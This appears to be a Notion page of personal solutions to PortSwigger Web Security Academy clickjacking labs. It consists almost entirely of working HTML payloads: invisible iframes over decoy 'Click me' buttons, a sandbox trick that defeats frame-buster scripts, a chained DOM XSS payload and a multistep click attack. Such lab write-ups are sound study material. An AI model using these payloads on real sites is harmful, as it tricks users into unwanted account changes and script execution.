Clickjacking | Notion

possible only if a website has something to click on dangerous and the iframing is enabled

Basic clickjacking with CSRF token protection

<style>
    iframe {
        position:relative;
        width:1000px;
        height:700px;
        opacity: 0.00001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:515;
        left:60;
        z-index: 1;
    }
</style>
<div>click me</div>
<iframe src="<https://0aa500560340a455859186e1007e0063.web-security-academy.net/my-account>"></iframe>

Clickjacking with form input data prefilled from a URL parameter

<style>
    iframe {
        position:relative;
        width:700;
        height: 500;
        opacity: 0.1;
        z-index: 2;
    }
    div {
        position:absolute;
        top:460;
        left:80;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="<https://0a0d00ad03731b2180c2a3b300250083.web-security-academy.net/[email protected]>"></iframe>

Clickjacking with a frame buster script

To bypass the anti framing :

sandbox=”allow-forms"

or sandbox=”allow-scripts”

or sandbox=”allow-top-navigation”

<style>
    iframe {
        position:relative;
        width:700;
        height: 500;
        opacity: 0.1;
        z-index: 2;
    }
    div {
        position:absolute;
        top:460;
        left:80;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="<https://0a3400af04565e5880ed8adf005e00e5.web-security-academy.net/[email protected]>" sandbox="allow-forms"></iframe>

Exploiting clickjacking vulnerability to trigger DOM-based XSS

there is a dom-based XSS in the name parameter of the submit feedback form but the victim as to click on submit feedback to trigger the XSS

<style>
    iframe {
        position:relative;
        width:1000;
        height: 1000;
        opacity: 0.1;
        z-index: 2;
    }
    div {
        position:absolute;
        top:820;
        left:80;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="<https://0abc00eb04e4f07c80323ad800590048.web-security-academy.net/feedback?name=%3Cimg%20src=1%20onerror=print()%3E&[email protected]&subject=test&message=test#feedbackResult%22%3E%3C/iframe%3E>"></iframe>

Multistep clickjacking

<style>
	iframe {
		position:relative;
		width:1000;
		height: 1000;
		opacity: 0.0001;
		z-index: 2;
	}
   .firstClick, .secondClick {
		position:absolute;
		top:520;
		left:40;
		z-index: 1;
	}
   .secondClick {
		top:310;
		left:195;
	}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="<https://0a85000604a73b83819dd93100e5003a.web-security-academy.net/my-account>"></iframe>